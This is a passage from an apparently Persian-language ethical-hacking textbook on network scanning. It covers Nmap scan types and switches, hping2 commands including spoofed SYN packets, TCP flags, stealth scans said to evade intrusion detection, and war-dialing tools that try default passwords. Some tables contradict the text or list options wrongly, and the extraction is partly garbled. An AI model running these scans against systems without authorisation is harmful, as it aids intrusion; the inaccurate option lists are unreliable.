ﻣﻌﻨﻲ اﺳﺖ ﻛﻪ ﭘﻮرت ﺑﺴﺘﻪ اﺳﺖ و ﻓﺎﻳﺮوال، ﺟﻠﻮي درﺧﻮاﺳﺖ ﻫﺎي Nmap را ﻧﻤ ﻲ ﮔﻴﺮد . Nmap ، از ﭼﻨﺪﻳﻦ ﻧﻮع اﺳﻜﻦ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲ ﻛﻨﺪ . ﺟﺪول زﻳﺮ، ﺑﺮﺧﻲ از راﻳﺞ ﺗﺮﻳﻦ روش ﻫﺎي اﺳﻜﻦ را ﺗﻮﺿﻴﺢ ﻣﻲ دﻫﺪ . .

ﻧﻮع اﺳﻜﻦ Nmap ﺗﻮﺿﻴﺢ

TCP connect ﺣﻤﻠﻪ ﻛﻨﻨﺪه، ﻳﻚ ارﺗﺒﺎط ﻛﺎﻣﻞ TCP ﺑﺎ ﺳﻴﺴﺘﻢ ﻫﺪف ﻣﻲ ﺳﺎزد . .

XMAS tree scan ﺣﻤﻠﻪ ﻛﻨﻨﺪه، ﺳﺮوﻳﺲ ﻫﺎي TCP را ﺑﺎ ارﺳﺎل ﺑﺴﺘﻪ ﻫﺎي XMAS-tree ، ﺑﺮرﺳﻲ ﻣﻲ ﻛﻨﺪ . ﺗﻤﺎم flag ﻫﺎي URG ، FIN و PSH ﺑﺎ ﻣﻘﺪار ﻳﻚ ﭘﺮ ﺷﺪه .اﻧﺪ .اﻧ ﺪ

SYN stealth scan اﺳﻜﻦ ﻧﻴﻤﻪ ﺑﺎز ( half-open ) ﻧﻴﺰ ﻧﺎﻣﻴﺪه ﻣﻲ ﺷﻮد . ﻫﻜﺮ، ﻳﻚ ﺑﺴﺘﻪ SYN را ارﺳﺎل ﻣﻲ ﻛﻨﺪ و در

41

ﭘﺎﺳﺦ ، ﻳﻚ SYN-ACK درﻳﺎﻓﺖ ﻣﻲ ﻛﻨﺪ . در واﻗﻊ ﻳﻚ ارﺗﺒﺎط ﻛﺎﻣﻞ TCP ﺑﺎز ﻧﻤﻲ ﺷﻮد . .

Null scan اﻳﻦ ﻳﻚ اﺳﻜﻦ ﭘﻴﺸﺮﻓﺘﻪ اﺳﺖ ﻛﻪ ﻣﻤﻜﻦ اﺳﺖ از ﻓﺎﻳﺮوال ﻋﺒﻮر ﻛﻨﺪ وﻟﻲ ﺷﻨﺎﺳﺎﻳﻲ ﻧﺸﻮد . در Null scan ، ﺗﻤﺎم flag ﻫﺎ ﺧﺎﻣﻮش ﻫﺴﺘﻨﺪ . اﻳﻦ اﺳﻜﻦ ﺗﻨﻬﺎ ﺑﺮ روي ﺳﻴﺴﺘﻢ ﻫﺎي ﻳﻮﻧﻴﻜﺲ ﻛﺎر ﻣﻲ ﻛﻨﺪ . .

Windows scan اﻳﻦ ﻧﻮع اﺳﻜﻦ، ﻣﺸﺎﺑﻪ ACK scan اﺳﺖ و ﻣﻲ ﺗﻮاﻧﺪ ﭘﻮرت ﻫﺎي ﺑﺎز را ﺷﻨﺎﺳﺎي ﻛﻨﺪ . .

ACK scan اﻳﻦ ﻧﻮع اﺳﻜﻦ، ﺑﺮاي ﻣﺸﺨﺺ ﻛﺮدن ﻗﻮاﻧﻴﻦ ﻓﺎﻳﺮوال اﺳﺖ . ACK scan ، ﺗﻨﻬﺎ ﺑﺮ روي ﻳﻮﻧﻴﻜﺲ ﻛﺎر ﻣﻲ ﻛﻨﺪ . .

ﺑﺮاي اﻧﺠﺎم اﺳﻜﻦ، Nmap داراي ﺗﻌﺪاي ﺳﻮﺋﻴﭻ دﺳﺘﻮري اﺳﺖ . ﺑﺮﺧﻲ از ﺳﻮﺋﻴﭻ ﻫﺎي دﺳﺘﻮري آن ﻋﺒﺎرﺗﻨﺪ از : :

اﺳﻜﻦ اﻧﺠﺎم ﺷﺪه دﺳﺘﻮر Nmap -sT TCP connect scan -sS SYN scan -sF FIN scan -sX XMAS tree scan -sN Null scan -sP Ping scan -sU UDP scan -sO Protocol scan -sA ACK scan -sW Windows scan -sR RPC scan -sL List/DNS scan -sI Idle scan -Po Don't ping -PT TCP ping -PS SYN ping -PI ICMP ping -PB TCP and ICMP ping -PB ICMP timestamp -PM ICMP netmask -oN Normal output -oX XML output -oG Greppable output -oA All output -T Paranoid Serial scan; 300 sec between scans -T sneaky Serial scan; 15 sec between scans

42

-T polite Serial scan; 4 sec between scans -T Normal Parallel scan -T Aggressive Parallel scan, 300 sec timeout, and 1.25 sec/probe -T Insane Parallel scan, 75 sec timeout, and 3 sec/probe

ﺑﺮاي اﻧﺠﺎم اﺳﻜﻦ Nmap ، در cmd وﻳﻨﺪوز ﻋﺒﺎرت Nmap IP address را ﺑﺎ ﻳﻜﻲ از ﺳﻮﺋﻴﭻ ﻫﺎي ﻣﻨﺎﺳﺐ ﺗﺎﻳﭗ ﻛﻨﻴﺪ . ﺑﺮاي ﻣﺜﺎل، ﺑﺮا ي اﺳﻜﻦ ﺳﻴﺴﺘﻤﻲ ﺑﻪ آدرس 192,168,0,1 ﺑﺎ اﺳﺘﻔﺎده از ﻧﻮع اﺳﻜﻦ TCP connect ، دﺳﺘﻮر زﻳﺮ را وارد ﻛﻨﻴﺪ : :

Nmap 192.168.0.1 –sT

HPING2

اﺑﺰار ﻣﺒﺘﻨﻲ ﺑﺮ دﺳﺘﻮر اﺳﺖ ﻛﻪ ﺣﺎﻟﺖ Traceroute را دارد و داراي ﻗﺎﺑﻠﻴﺖ ﺗﺴﺖ ﻓﺎﻳﺮوال، اﺳﻜﻦ ﭘﻴﺸﺮﻓﺘﻪ ﭘﻮرت، ﺗﺴﺖ ﺷﺒﻜﻪ اي ﺑﺎ اﺳﺘﻔﺎده از ﭘﺮوﺗﻜﻞﻫ ﺎي ﻣﺨﺘﻠﻒ، ﺷﻨﺎﺳﺎﻳﻲ ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ از راه دور، Traceroute ﭘﻴﺸﺮﻓﺘﻪ و ... اﺳﺖ . ﺑﺮﺧﻲ از دﺳﺘﻮرات اﻳﻦ اﺑﺰار ﺑﻪ ﻗﺮار زﻳﺮ اﺳﺖ : :

Hping2 10.0.0.5

اﻳﻦ دﺳﺘﻮر، ﻳﻚ ﺑﺴﺘﻪ TCP null-flags ﺑﻪ ﭘﻮرت 0 ﻛﺎﻣﭙﻴﻮﺗﺮ 10.0.0.5 ارﺳﺎل ﻣﻲ ﻛﻨﺪ . .

Hping2 10.0.0.5 –p 80

اﻳﻦ دﺳﺘﻮر، ﺑﺴﺘﻪ اي ﺑﻪ ﭘﻮرت 80 ارﺳﺎل ﻣﻲ ﻛﻨﺪ.

Hping2 –a 10.0.0.5 –s –p 81 10.0.0.25

اﻳﻦ دﺳﺘﻮر، از ﻃﺮﻳﻖ ﻳﻚ trusted party ﺑﺴﺘﻪ ﻫﺎي SYN ﺟﻌﻠﻲ ﺑﻪ ﭘﻮرت 81 ﻫﺪف ارﺳﺎل ﻣﻲ ﻛﻨﺪ.

Hping www.debian.org –p 80 –A

ﻦاﻳ دﺳﺘﻮر، ﺑﻪ ﭘﻮرت 80 ﺳﺎﻳﺖ www.debian.org ﺑﺴﺘﻪ ﻫﺎي ACK ارﺳﺎل ﻣﻲ ﻛﻨﺪ . .

Hping www.yahoo.com –p 80 –A

اﻳﻦ دﺳﺘﻮر، ﭘﺎﺳﺦ ﻫﺎي IPID را ﺑﺮرﺳﻲ ﻣﻲ ﻛﻨﺪ . . 43

اﺳﻜﻦ ﻫﺎي IDLE ، NULL ، XMAS ، Stealth ، SYN ، و FIN

SYN: اﺳﻜﻦ SYN ﻳﺎ stealth ، ﺑﺎ ﻧﺎم اﺳﻜﻦ ﻧﻴﻤﻪ ﺑﺎز ﻧﺎﻣﻴﺪه ﻣﻲ ﺷﻮد ﺑﺮاي اﻳﻨﻜﻪ ﻋﻤﻠﻴﺎت دﺳﺖ ﺗﻜﺎﻧﻲ ﺳﻪ ﻣﺮﺣﻠﻪ اي TCP را ﻛﺎﻣﻞ ﻧﻤﻲ ﻛﻨﺪ . دﺳﺖ ﺗﻜﺎﻧﻲ ﺳﻪ ﻣﺮﺣﻠﻪ اي TCP/IP در ﺑﺨﺶ ﻫﺎي ﺑﻌﺪي ﺗﻮﺿﻴﺢ داده ﺧﻮاﻫﺪ ﺷﺪ . ﻫﻜﺮ ﺑﺴﺘﻪ SYN را ﺑﻪ ﻫﺪف ارﺳﺎل ﻣﻲ ﻛﻨﺪ اﮔﺮ ﻓﺮﻳﻢ SYN/ACK ﺑﺮﮔﺸﺖ داده ﺷﺪ، ﻳﻌﻨﻲ ، ﻫﺪف ارﺗﺒﺎط را ﻛﺎﻣﻞ ﻛﺮده و ﭘﻮرت در ﺣﺎل ﮔﻮش دادن اﺳﺖ . اﮔﺮ RST ﺑﺮﮔﺸﺖ داده ﺷﺪ، ﻳﻌﻨﻲ ﭘﻮرت ﻳﺎ ﻓﻌﺎل و ﻳﺎ ﺑﺴﺘﻪ اﺳﺖ . ﻣﺰ اﻳﺎي اﺳﻜﻦ SYN stealth اﻳﻦ اﺳﺖ ﻛﻪ اﻏﻠﺐ ﺳﻴﺴﺘﻢ ﻫﺎي ﺗﺸﺨﻴﺺ ﻧﻔﻮذ ﻧﻤﻲ ﺗﻮاﻧﻨﺪ آن را ﺑﻪ ﻋﻨﻮان ﺣﻤﻠﻪ ﻳﺎ ﺗﻼش ﺑﺮاي ارﺗﺒﺎط ﺗﺸﺨﻴﺺ دﻫﻨﺪ . .

XMAS: اﺳﻜﻦ ﻫﺎي XMAS ، ﺑﺴﺘﻪ اي را ﺑﺎ flag ﻫﺎي URG ، FIN و PSH ارﺳﺎل ﻣﻲ ﻛﻨﺪ . اﮔﺮ ﭘﻮرت ﺑﺎز ﺑﺎﺷﺪ، ﭘﺎﺳﺨﻲ وﺟﻮد ﻧﺨﻮاﻫﺪ داﺷﺖ اﻣﺎ اﮔﺮ ﭘﻮرت ﺑﺴﺘﻪ ﺑﺎﺷﺪ، ﻫﺪف، ﺑﺴﺘﻪ RST/ACK را ﺑﺮﻣﻲ ﮔﺮداﻧﺪ . XMAS scan ﺗﻨﻬﺎ ﺑﺮ روي ﺳﻴﺴﺘﻢ ﻫﺎﻳﻲ ﻛﻪ داراي ﭘﻴﺎده ﺳﺎزي RFC 793 ﻫﺴﺘﻨﺪ ﻛﺎر ﻣﻲ ﻛﻨﻨﺪ و ﺑﺮ اي ﻧﺴﺨﻪ ﻫﺎي وﻳﻨﺪوز ﻛﺎر ﻧﻤﻲ ﻛﻨﺪ . .

FIN: اﺳﻜﻦ FIN ، ﻣﺸﺎﺑﻪ اﺳﻜﻦ XMAS اﺳﺖ اﻣﺎ ﺑﺴﺘﻪ اي را ﻛﻪ ﺗﻨﻬﺎ داراي FIN flag اﺳﺖ ارﺳﺎل ﻣﻲ ﻛﻨﺪ . FIN scan ﻫﻤﺎن ﭘﺎﺳﺦ را درﻳﺎﻓﺖ ﻣﻲ ﻛﻨﺪ و ﻫﻤﺎن ﻣﺤﺪودﻳﺖ ﻫﺎي XMAS scan را دارد . .

44

NULL: ﻣﺤﺪودﻳﺖ ﻫﺎ و ﭘﺎﺳﺦ ﻫﺎي اﺳﻜﻦ NULL ﻣﺸﺎﺑﻪ XMAS و FIN اﺳﺖ اﻣﺎ ﺑﺴﺘﻪ اي را ﺑﺪون flag ارﺳﺎل ﻣﻲ ﻛﻨﺪ . .

IDLE: اﺳﻜﻦ IDLE ، از آدرس IP ﺟﻌﻠﻲ ﺑﺮاي ارﺳﺎل ﺑﺴﺘﻪ SYN ﺑﻪ ﻣﻘﺼﺪ اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ . ﺑﺴﺘﻪ ﺑﻪ ﭘﺎﺳﺦ ، ﭘﻮرت ﻣﻲ ﺗﻮاﻧﺪ ﺑﺎز ﻳﺎ ﺑﺴﺘﻪ ﺑﺎﺷﺪ . IDLE scan ، ﭘﺎﺳﺦ اﺳﻜﻦ را ﺑﺎ ﻣﺎﻧﻴﺘﻮرﻳﻨﮓ sequence number ﻫﺪر IP ، ﺗﻌﻴﻴﻦ ﻣﻲ ﻛﻨﺪ . .

اﻧﻮاع flag ﻫﺎي ارﺗﺒﺎط TCP

ارﺗﺒﺎﻃﺎت TCP ، ﭘﻴﺶ از اﻳﺠﺎد ارﺗﺒﺎط و اﻧﺘﻘﺎل داده، ﻧﻴﺎز ﺑﻪ دﺳﺖ ﺗﻜﺎﻧﻲ ﺳﻪ ﻣﺮﺣﻠﻪ اي ( 3-way handshake ) دارد . ﺷﻜﻞ زﻳﺮ، ﻣﺮاﺣﻞ اﻳﺠﺎد اﻳﻦ ارﺗﺒﺎط را ﻧﺸﺎن ﻣﻲ دﻫﺪ . .

ﺑﺮاي ﺗﻜﻤﻴﻞ دﺳﺖ ﺗﻜﺎﻧﻲ ﺳﻪ ﻣﺮﺣﻠﻪ اي و اﻳﺠﺎد ارﺗﺒﺎط ﻣﻮﻓﻘﻴﺖ آﻣﻴﺰ ﺑﻴﻦ دو ﺳﻴﺴﺘﻢ، ﻓﺮﺳﺘﻨﺪه ﺑﺎﻳﺴﺘﻲ ﻳﻚ ﺑﺴﺘﻪ TCP ﺑﺎ ﺑﻴﺖ SYN ارﺳﺎل ﻛﻨﺪ . ﺳﭙﺲ، ﺳﻴﺴﺘﻢ درﻳﺎﻓﺖ ﻛﻨﻨﺪه، ﺑﺎ ﺑﺴﺘﻪ TCP ﻛﻪ داراي ﺑﻴﺖ SYN و ACK اﺳﺖ، ﭘﺎﺳﺦ ر ا ﻣﻲ دﻫﺪ ﻛﻪ ﻧﺸﺎن دﻫﻨﺪه اﻳﻦ اﺳﺖ ﻛﻪ ﺳﻴﺴﺘﻢ آﻣﺎده درﻳﺎﻓﺖ داده اﺳﺖ . ﺳﻴﺴﺘﻢ ﻣﺒﺪا، ﺑﺴﺘﻪ ﻧﻬﺎﻳﻲ را ﺑﺎ ﺑﻴﺖ ACK ارﺳﺎل ﻣﻲ ﻛﻨﺪ ﻛﻪ ﻧﺸﺎن ﻣﻲ دﻫﺪ ارﺗﺒﺎط ﻛﺎﻣﻞ ﺷﺪه اﺳﺖ و داده ﻫﺎ آﻣﺎده ارﺳﺎل ﺷﺪن ﻫﺴﺘﻨﺪ . .

45

از آﻧﺠﺎﺋﻴﻜﻪ TCP ، ﻳﻚ ﭘﺮوﺗﻜﻞ اﺗﺼﺎل ﮔﺮا ( connection-oriented ) اﺳﺖ ، ﻓﺮآﻳﻨﺪ ﺑﺮﻗﺮاري ارﺗﺒﺎط، راه اﻧﺪازي ﻣﺠﺪ د ارﺗﺒﺎط ﻗﻄﻊ ﺷﺪه، و ﺧﺎﺗﻤﻪ ارﺗﺒﺎط، ﺑﺨﺸﻲ از ﭘﺮوﺗﻜﻞ اﺳﺖ . اﻳﻦ ﻧﺸﺎﻧﮕﺮﻫﺎي ﭘﺮوﺗﻜﻞ، flag ﻧﺎﻣﻴﺪه ﻣﻲ ﺷﻮد . ﭘﺮوﺗﻜﻞ TCP ، ﺷﺎﻣﻞ flag ﻫﺎي PSH ، URG ، SYN ، RST ، ACK ، و FIN اﺳﺖ . ﻟﻴﺴﺖ زﻳﺮ، ﻋﻤﻠ ﻜﺮد flag ﻫﺎي TCP را ﻧﺸﺎن ﻣﻲ دﻫﺪ : :

Synchronize ) SYN ): ارﺗﺒﺎط را ﺑﻴﻦ ﺳﻴﺴﺘﻢ ﻫﺎ ﺷﺮوع ﻣﻲ .ﺪﻛﻨ .ﺪﻛﻨ

Acknowledge ) ACK ): ارﺗﺒﺎط را ﺑﻴﻦ ﺳﻴﺴﺘﻢ ﻫﺎ ﺑﺮﻗﺮار ﻣﻲ ﺳﺎزد . .

Push ) PSH ): ﺳﻴﺴﺘﻢ، داده ﺑﺎﻓﺮ ﺷﺪه را ﻓﺮوارد ﻣﻲ ﻛﻨﺪ . .

Urgent ) URG ): داده ﻫﺎي داﺧﻞ ﺑﺴﺘﻪ، ﺑﺎﻳﺪ ﺳﺮﻳﻌﺘﺮ ﭘﺮدازش ﺷﻮﻧﺪ . .

Finish ) FIN ): دﻳﮕﺮ اﻧﺘﻘﺎل اﻧﺠﺎم ﻧﮕﻴﺮد . .

Reset ) RST ): ارﺗﺒﺎط را دوﺑﺎره راه اﻧﺪازي ﻣﻲ .ﺪﻛﻨ .ﺪﻛﻨ

ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ ﺑﺎ اﺳﺘﻔﺎده از flag ﻫﺎ، ﺑﻪ ﺟﺎي ﺗﻜﻤﻴﻞ ﻛﺮدن ارﺗﺒﺎط ﻛﺎﻣﻞ TCP ، از ﺷﻨﺎﺳﺎﻳﻲ ﺟﻠﻮﮔﻴﺮي ﻛﻨﺪ . اﻧﻮاع اﺳﻜﻦ TCP ﻛﻪ در ﺟﺪول زﻳﺮ ﻟﻴﺴﺖ ﺷﺪه اﺳﺖ ﺗﻮﺳﻂ ﺑﺮﺧﻲ از اﺑﺰارﻫﺎي اﺳﻜﻦ ﺑﺮاي درﻳﺎﻓﺖ ﭘﺎﺳﺦ از ﻳﻚ ﺳﻴﺴﺘﻢ ﻳﺎ ﺗﻨﻈﻴﻢ flag اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد . .

XMAS Scan Flags sent by hacker XMAS scan All flags set (ACK, RST, SYN, URG, PSH, FIN) FIN scan FIN NULL Scan No flags set TCP connect/full-open scan SYN, then ACK SYN scan/half-open scan SYN, then RST

46

FloppyScan

ﻳﻜﻲ از اﺑﺰارﻫﺎي ﺧﻄﺮﻧﺎك ﻫﻚ اﺳﺖ ﻛﻪ ﺑﺮاي اﺳﻜﻦ ﭘﻮرت ﺑﺎ اﺳﺘﻔﺎده از ﻓﻼ ﭘﻲ دﻳﺴﻚ ﺑﻜﺎر ﻣﻲ رود . ﻣﺤﺘﻮاي آن، mini Linux اﺳﺖ و ﺑﺎ اﺳﺘﻔﺎده از NMAP ، ﭘﻮرت ﻫﺎ را اﺳﻜﻦ ﻣﻲ ﻛﻨﺪ و از ﻃﺮﻳﻖ اﻳﻤﻴﻞ، ﻧﺘﺎﻳﺞ آن را راﺳﺎل ﻣﻲ ﻛﻨﺪ . ﺷﻜﻞ زﻳﺮ، ﻣﺮاﺣﻞ FloppyScan را ﻧﺸﺎن ﻣﻲ دﻫﺪ . .

اﺑﺰارﻫﺎي ﻫﻚ IPEye ، ﻳﻚ اﺳﻜﻨﺮ ﭘﻮرت TCP اﺳﺖ ﻛﻪ ﻣﻲ ﺗﻮاﻧﺪ اﺳﻜﻦ ﻫﺎي Null ، FIN ، SYN و XMAS را اﻧﺠﺎم دﻫﺪ . و ﻳﻚ اﺑﺰار ﺧﻂ دﺳﺘﻮري ( Command-Line ) اﺳﺖ . IPEye ، ﭘﻮرت ﻫﺎي روي ﺳﻴﺴﺘﻢ ﻫﺪف و ﭘﺎﺳﺦ ﻫﺎ را ﭘﻮﻳﺶ ﻣﻲ ﻛﻨﺪ . ﭘﻮرت ﺑﺴﺘﻪ ( closed ،) ﺑﻪ ﻣﻌﻨﺎي اﻳﻦ اﺳﺖ ﻛﻪ ﻛﺎﻣﭙﻴﻮﺗﺮي وﺟﻮد دارد اﻣﺎ ﺑﻪ آن ﭘﻮرت ﮔﻮش ﻧﻤﻲ دﻫﺪ . ﭘﺎﺳﺦ رد ( reject) ، ﺑﻪ اﻳﻦ ﻣﻌﻨﺎﺳﺖ ﻛﻪ ﻓﺎﻳﺮوال، ارﺗ ﺒﺎط ﺑﺎ آن ﭘﻮرت را رد ﻣﻲ ﻛﻨﺪ . ﭘﺎﺳﺦ دور اﻧﺪاﺧﺘﻦ ( drop ) ﺑﻪ اﻳﻦ ﻣﻌﻨﺎ اﺳﺖ ﻛﻪ ﻓﺎﻳﺮوال، ﻫﺮ ﭼﻴﺰي را روي ﭘﻮرت دور ﻣﻲ اﻧﺪازد ﻳﺎ ﻛﺎﻣﭙﻴﻮﺗﺮ وﺟﻮد ﻧﺪارد . ﭘﺎﺳﺦ ﺑﺎز ( open ) ﺑﻪ اﻳﻦ ﻣﻌﻨﺎﺳﺖ ﻛﻪ ﺑﺮﺧﻲ از ﺳﺮوﻳﺲ ﻫﺎ ﺑﻪ آن ﭘﻮرت ﮔﻮش ﻣﻲ دﻫﻨﺪ . .

IPSecScan ، اﺑﺰاري اﺳﺖ ﻛﻪ ﻣﻲ ﺗﻮاﻧﺪ ﺗﻨﻬﺎ ﻳﻚ آدرس IP ﻳﺎ ﺑﺎزه اي از آدرس ﻫﺎ را ﺟﺴﺘﺠﻮ ﻛﻨﺪ ﺗﺎ ﺑﺒﻴﻨﺪ IPSec ﺑﺮ روي ﻛﺪاﻣﻴﻚ از ﺳﻴﺴﺘﻢ ﻫﺎ ﻓﻌﺎل اﺳﺖ . .

Hping2 ، ﻗﺎﺑﻞ ﺗﻮﺟﻪ اﺳﺖ ﺑﺮاي ا ﻳﻨﻜﻪ ﻋﻼوه ﺑﺮ ﺷﻨﺎﺳﺎﻳﻲ ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ، داراي ﻗﺎﺑﻠﻴﺖ ﻫﺎي دﻳﮕﺮي ﻫﻤﭽﻮن ﭘﺮوﺗﻜﻞ ﻫﺎي traceroue mode ، ICMP ، UDP ، TCP ، و ﻗﺎﺑﻠﻴﺖ ارﺳﺎل ﻓﺎﻳﻞ ﻫﺎ ﺑﻴﻦ ﺳﻴﺴﺘﻢ ﻣﻨﺒﻊ و ﻣﻘﺼﺪ اﺳﺖ . .

47

SNMP Scanner ، ﺑﻪ ﺷﻤﺎ اﺟﺎزه ﻣﻲ دﻫﺪ ﺑﺎزه اي از ﺳﻴﺴﺘﻢ ﻫﺎ را ﺑﺎ اﺳﺘﻔﺎده از ﻛﻮﺋﺮي ﻫﺎي DNS ، ping ، و SNMP اﺳﻜﻦ ﻛﻨﻴﺪ . .

Netscan Tools Pro 2000, Hping2, KingPingicmpenum و SNMP Scanner اﺑﺰارﻫﺎﻳﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻲ ﺗﻮاﻧﻨﺪ ﺑﺮاي ﺷﻨﺎﺳﺎﻳﻲ ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ اﺳﺘﻔﺎده ﺷﻮﻧﺪ . .

ﺗﻜﻨﻴﻚ ﻫﺎي War-Dialing

War dialing ، ﻓﺮآﻳﻨﺪ ﺗﻤﺎس ﺑﺎ ﺷﻤﺎره ﻣﻮدم ﺑﺮاي ﻳﺎﻓﺘﻦ ارﺗﺒﺎط ﺑﺎز ﻣﻮدم اﺳﺖ ﻛﻪ اﺟﺎزه دﺳﺘﺮﺳﻲ از راه دور را ﺑﻪ ﻳﻚ ﺷﺒﻜﻪ ﺑﺪﻫﺪ . ﻛﻠﻤﻪ war dialing ، از اوﻟﻴﻦ روزﻫﺎي اﻳﻨﺘﺮﻧﺖ ﺑﻪ وﺟﻮد آﻣﺪ زﻣﺎﻧﻴﻜﻪ اﻏﻠﺐ ﺷﺮﻛﺖ ﻫﺎ از ﻃﺮﻳﻖ ﻣﻮدم dial-up ﺑﻪ اﻳﻨﺘﺮ ﻧﺖ ﻣﺘﺼﻞ ﺑﻮدﻧﺪ . War dialing ، ﺑﻪ ﻋﻨﻮان روش اﺳﻜﻦ ﺷﻨﺎﺧﺘﻪ ﻣﻲ ﺷﻮد ﺑﺮاي اﻳﻨﻜﻪ ﺑﻪ دﻧﺒﺎل ارﺗﺒﺎﻃﺎت ﺷﺒﻜﻪ اي دﻳﮕﺮي ﻣﻲ ﮔﺮدد ﻛﻪ ﻣﻤﻜﻦ اﺳﺖ ﻧﺴﺒﺖ ﺑﻪ ارﺗﺒﺎط اﻳﻨﺘﺮﻧﺘﻲ اﺻﻠﻲ، داراي اﻣﻨﻴﺖ ﭘﺎﻳﻴﻦ ﺗﺮي ﺑﺎﺷﺪ . ﺑﺴﻴﺎري از ﺳﺎزﻣﺎن ﻫﺎ، ﻣﻮدم ﻫﺎي remote access را راه اﻧﺪازي ﻣﻲ ﻛﻨﻨﺪ ﻛﻪ ﻫﺮ ﭼﻨﺪ ﻛﻪ اﻣﺮوزه ﻣﻨﺴﻮخ ﺷﺪه ﻫﺴﺘﻨﺪ وﻟﻲ ﻧﻤﻲ ﺗﻮان اﻳﻦ ﺳﺮورﻫﺎي remote-access را ﺣﺬف ﻛﺮد . اﻳﻦ ﺑﺎﻋﺚ ﻣﻲ ﺷﻮد ﻛﻪ ﻫﻜﺮﻫﺎ روش ﺳﺎده اي ﺑﺮاي وارد ﺷﺪن ﺑﻪ ﺷﺒﻜﻪ ﭘﻴﺪا ﻛﻨﻨﺪ . ﺑﺮاي ﻣﺜﺎل، ﺑﺴﻴﺎري از ﺳﻴﺴﺘﻢ ﻫﺎي دﺳﺘﺮﺳﻲ راه دور، از PAP اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﻨﺪ ﻛﻪ ﭘﺴﻮرد را ﺑﺼﻮرت ﻏﻴﺮ رﻣﺰ ﺷﺪه ارﺳﺎل ﻣﻲ ﻛﻨﺪ در ﺣﺎﻟﻴﻜﻪ ﺗﻜﻨﻮﻟﻮژي ﺟﺪﻳﺪ ﻛﻪ VPN ﻧﺎم دارد، ﭘﺴﻮردﻫﺎ را رﻣﺰ ﻣﻲ ﻛﻨﺪ . .

اﺑﺰارﻫﺎي War-dialing ، در ﺷﺮاﻳﻄﻲ ﻛﺎر ﻣﻲ ﻨﻛ ﻨﺪ ﻛﻪ ﺷﺮﻛﺖ ﻫﺎ، ﭘﻮرت ﻫﺎي ورودي ( dial-in ) را ﻛﻨﺘﺮل ﻧﻜﻨﻨﺪ . ﺑﺴﻴﺎري از ﺳﺮورﻫﺎ، ﻫﻨﻮز ﻫﻢ از ﻣﻮدم ﺑﺎ ﺧﻂ ﺗﻠﻔﻦ ﺑﻪ ﻋﻨﻮان ﭘﺸﺘﻴﺒﺎن اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﻨﺪ . اﻳﻦ ار ﺗﺒﺎﻃﺎت ﻣﻮدم، ﻣﻲ ﺗﻮاﻧﺪ ﺑﺮاي ﺑﺮﻧﺎﻣﻪ war-dialing ﺑﺮاي اﻳﺠﺎد دﺳﺘﺮﺳﻲ ﺑﻪ ﺳﻴﺴﺘﻢ و ﺷﺒﻜﻪ داﺧﻠﻲ اﺳﺘﻔﺎده ﺷﻮد . .

اﺑﺰارﻫﺎي ﻫﻚ THC-Scan, ModemScan, ToneLoc, Phonesweep, war dialer و telesweep ، اﺑﺰارﻫﺎﻳﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﺷﻤﺎره ﺗﻠﻔﻦ ﻫﺎ را ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲ ﻛﻨﺪ و ﻣﻲ ﺗﻮاﻧﺪ ﻫﺪف را ﺷﻤﺎره ﮔﻴﺮ ي ﻛﻨﺪ ﺗﺎ ارﺗﺒﺎﻃﻲ ﺑﺎ ﻣﻮدم ﻛﺎﻣﭙﻴﻮﺗﺮ ﺑﺮﻗﺮار ﻛﻨﺪ . اﻳﻦ اﺑﺰارﻫﺎ، ﺑﺎ اﺳﺘﻔﺎده از ﻧﺎم ﻫﺎي ﻛﺎرﺑﺮي و ﻛﻠﻤﺎت ﻋﺒﻮر ﭘﻴﺶ ﻓﺮض ﻛﺎر ﻣﻲ ﻛﻨﻨﺪ ﺗﺎ ﺑﺘﻮاﻧﻨﺪ ﺑﻪ ﺳﻴﺴﺘﻢ ﻣﺘﺼﻞ ﺷﻮﻧﺪ . ﺑﺴﻴﺎري از ارﺗﺒﺎﻃﺎت از راه دور، ﺑﻪ ﺧﺎﻃﺮ اﻳﻦ ﭘﺴﻮردﻫﺎ اﻣﻦ ﻧﻴﺴﺘﻨﺪ . .

48

ﺗﻜﻨﻴﻚ ﻫﺎي Banner Grabbing و ﺷﻨﺎﺳﺎﻳﻲ ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ

Banner Grabbing و ﺷﻨﺎﺳﺎﻳﻲ ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ، ﻛﻪ ﺑﻪ ﻋﻨﻮان ﺷﻨﺎﺳﺎﻳﻲ ﭘﺸﺘﻪ TCP/IP ﺷﻨﺎﺧﺘﻪ ﻣﻲ ﺷﻮد، ﭼﻬﺎرﻣﻴﻦ ﻣﺮﺣﻠﻪ در ﻣﺘﺪﻟﻮژي اﺳﻜﻦ اﺳﺖ . ﻓﺮآﻳﻨﺪ ﺷﻨﺎﺳﺎﻳﻲ ، ﺑﻪ ﻫﻜﺮ اﺟﺎزه ﻣﻲ دﻫﺪ آﺳﻴﺐ ﭘﺬﻳﺮي ﻫﺎ را روي ﺷﺒﻜﻪ ﭘﻴﺪا ﻛﻨﺪ . ﻫﻜﺮﻫﺎ، ﺑﻪ دﻧﺒﺎل ﺳﺎده ﺗﺮﻳﻦ روش ﺑﺮاي اﻳﺠﺎد دﺳﺘﺮﺳﻲ ﺑﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ﻳﺎ ﺷﺒﻜﻪ ﻫﺴﺘﻨﺪ . Banner grabbing ، ﻓﺮآﻳﻨﺪ ﺑﺎز ﻛﺮدن ﻳﻚ ارﺗﺒﺎط و ﺧﻮاﻧﺪن ﺑﻨﺮ ﻳﺎ ﭘﺎﺳﺦ ارﺳﺎل ﺷﺪه ﺗﻮﺳﻂ ﺑﺮﻧﺎﻣﻪ اﺳﺖ . ﺑﺴﻴﺎري از اﻳﻤﻴﻞ ﻫﺎ، FTP ، و وب ﺳﺮورﻫﺎ ﺑﻪ ارﺗﺒﺎط telnet ﺑﺎ اﺳﻢ و ﻧﺴﺨﻪ ﻧﺮم اﻓﺰار 